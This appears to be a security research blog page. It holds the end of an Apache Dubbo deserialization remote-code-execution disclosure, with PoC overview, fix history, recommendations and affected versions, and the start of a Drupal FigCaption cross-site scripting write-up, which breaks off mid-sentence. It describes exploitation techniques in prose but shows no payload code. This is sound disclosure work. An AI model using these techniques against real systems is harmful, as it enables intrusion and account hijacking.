Either use the code sample from my previous research blog or follow this guide:

Follow the Official Apache Dubbo Quick-Start guide until a functioning provider and registry are successfully created (see here for a full sample)
Ensure dubbo-common, or a package where this dependency is not optional, is in scope

Add the following dependencies to enable Spring Framework, Dubbo and Dubbo Common (presented in Maven pom.xml form for ease of use):

Triggering Vulnerability PoC

See this link for functioning POC code. The gadget chain being exploited here, which is native to Dubbo 2.7.3’s ecosystem, is clearly broken down in Part 1. The rest of this POC takes this gadget, and reimplements the Dubbo protocol to wrap it with the appropriate preamble, flags, and headers to exploit a vulnerable deserializer on a receiving Dubbo endpoint.

Fig. 7 – Deserialization Gadget Writes “whoops!” to Java Console, and Starts Calc.exe

Vulnerability Evolution

Between the disclosure of this issue and the CVE, this issue has evolved across several releases. For versions 2.7.5 and 2.7.6 – the vulnerable deserializers have been removed from the core packages into their own respective packages. This functionality is imported separately, in the form of the dubbo-serialization-kryo/fst packages. In 2.7.7, according to documentation, it is no longer possible to pass garbage values in the Dubbo stream – deserialization does not occur without a proper method and service name.

Conclusions

This exploit, following the previous PoC for exploiting the HTTP protocol in version 2.7.3, further illustrates the need for strict whitelisting combined with class resolution look-ahead within any remote invocation services that deal with serialized objects – not just for Dubbo, and not just for Java.
While this issue is glaring for Dubbo 2.7.3 and under, because of the gadget chain relying on an outdated FastJSON discovered and disclosed in the previous research, this only scratches the surface of this attack – other gadget chains may still exist within Dubbo’s internals, and most Dubbo instances will rely on other dependencies beyond those bundled with this software, allowing for a more diverse dependency ecosystem and allowing similar forms of exploitation to persist until a robust whitelist solution is used within Dubbo’s internals.
At present, it is safe to assume many (and probably most) instances of Dubbo <= 2.7.3 are vulnerable to remote code execution via deserialization of untrusted data, while any Dubbo version under 2.7.8 has some form of unsafe deserialization going on in the Dubbo Protocol pipeline. Version 2.7.9 added a configuration flag to prevent “chosen deserializer” attacks such as this. Whether a given instance is vulnerable depends on gadget availability – which is always a likely possibility.

Recommendations

Upgrade from Alibaba Dubbo to Apache Dubbo; Alibaba Dubbo does not appear to be officially maintained any longer
Update Apache Dubbo to its latest version
Never import unnecessary Dubbo packages, e.g. dubbo-serialization-kryo where Kryo is not actively used, to reduce the attack surface against the RMI interface

Disclosure Timeline

2/5/20 – Disclosure of Dubbo RCE Deserialization Exploit
2/19/20 – Reminder #1 to Apache Security Team
4/6/20 – Reminder #2 to Apache Security Team
7/27/20 – Reminder #3 to Apache Security Team
1/22/21 – First Acknowledgement of Issue
2/26/21 – Fix Released
6/4/21 – Public Disclosure

Apache Package Versions

Deserialization RCE with FastJSON Gadget:
Vulnerable package: org.apache.dubbo.dubbo <= 2.7.3
Requirements:
org.apache.dubbo.dubbo-common <= 2.7.9
org.springframework.spring-web – 5.3.4
Deserialization vulnerability without FastJSON Gadget, requires additional deserialization gadget in scope:
Vulnerable package: org.apache.dubbo.dubbo <= 2.7.6 – implementation dependent
Requirements:
org.apache.dubbo.dubbo-common <= 2.7.9
dubbo-serialization-kryo AND/OR dubbo-serialization-fst – <=2.7.9

Alibaba Package Versions

Despite certain signs of life, Alibaba Dubbo is no longer officially maintained – all Alibaba Dubbo resources now point to Apache Dubbo.
Deserialization RCE with FastJSON Gadget:
Vulnerable package: com.alibaba.dubbo <= 2.6.7
Requirements:
com.alibaba.dubbo-serialization-kryo OR com.alibaba.dubbo-serialization-fst <= 2.6.7
org.springframework.spring-web – 5.3.4
Deserialization vulnerability without FastJSON Gadget, requires additional deserialization gadget in scope:
Vulnerable package: com.alibaba.dubbo <= 2.6.9
Requirements:
com.alibaba.dubbo-serialization-kryo OR com.alibaba.dubbo-serialization-fst <= 2.6.9
org.springframework.spring-web – 5.3.4

Final Words

Disclosures like this are part of the Checkmarx Security Research Team’s efforts to drive changes in software security practices. Checkmarx is committed to analyzing open source packages to help development teams build and deploy more secure software.

Drupal Core: Behind the Vulnerability

Dor Tumarkin — Wed, 02 Dec 2020 08:12:36 +0000

As you may recall, back in June, Checkmarx disclosed multiple cross-site scripting (XSS) vulnerabilities impacting Drupal Core, listed as CVE-2020-13663, followed by a more technical breakdown of the findings in late November. Today, we’re releasing details surrounding additional, new vulnerabilities (CVE-2020-13669) uncovered in Drupal Core as part of our continued research of the open source CMS platform. All research was conducted and reported to Drupal by Dor Tumarkin of Checkmarx.

CVE-2020-13669 – Overview

Drupal Security Risk: Moderately Critical – https://www.drupal.org/sa-core-2020-010
Vulnerable versions:

Drupal 8.8 – before 8.8.10
Drupal 8.9 – before 8.9.6
Drupal 9 – before 9.0.6
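
As a quick way to check a site against the ranges listed above, the following is a minimal Python sketch. The `FIXED_RELEASES` table and the `is_affected` helper are hypothetical names, not part of Drupal or the advisory. The sketch assumes plain numeric version strings such as "8.9.5" (no "-rc" or "-dev" suffixes) and reads "Drupal 9 – before 9.0.6" as referring to the 9.0 branch; branches outside the list return `None`, since the list says nothing about them.

```python
from typing import Optional

# First fixed release for each affected branch, taken from the list above.
# Reading "Drupal 9" as the 9.0 branch is an assumption of this sketch.
FIXED_RELEASES = {
    (8, 8): (8, 8, 10),
    (8, 9): (8, 9, 6),
    (9, 0): (9, 0, 6),
}


def is_affected(version: str) -> Optional[bool]:
    """Return True/False for listed branches, None for unlisted ones."""
    parsed = tuple(int(part) for part in version.split("."))
    fixed = FIXED_RELEASES.get(parsed[:2])
    if fixed is None:
        # Branch not covered by the list; no verdict is given.
        return None
    # Tuples compare element by element, so (8, 8, 9) < (8, 8, 10).
    return parsed < fixed


if __name__ == "__main__":
    for candidate in ("8.8.9", "8.9.6", "9.0.5"):
        print(candidate, is_affected(candidate))
```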

Impact Summary

Inject malicious code in webpages via Cross-Site Scripting to:
- Hijack user accounts
- Inject malicious web-content, such as malicious login or payment forms
Deface a page to hide its contents
Redirect users to a website of an attacker’s choice, allowing them to abuse users’ trust in the victim website

CVE-2020-13669 – FigCaption Widget – Self-XSS, Stored DOM Manipulation, and XSS Potential

Vulnerability Proof of Concept (PoC)

The Figure Caption Widget (“FigCaption”) allows even basic content contributors with Basic HTML content privileges to insert a caption into their content. It is bundled with Drupal Core’s default CKEditor.
The raw HTML of such a caption would be of the following form:

Once submitted or rendered, this HTML is morphed into an entire HTML tree that presents the image inside CKEditor. However, the “data-caption” attribute may itself contain HTML, which is then rendered, and suffers from multiple issues as follows:

A lack of consistency between the HTML attribute whitelists for the general CKEditor and for the internal FigCaption HTML, which lets the HTML inside FigCaption contain arbitrary attributes, allowing:
- Injecting arbitrary attributes and classes into HTML tags, such as classes whose CSS covers the entire app, permanently defacing pages with a redirection to a site of an attacker’s choosing (it should be noted that “on*” event attributes, such as “onclick”, are still properly sanitized)

A lack of sanitization when rendering in preview mode, allowing injecting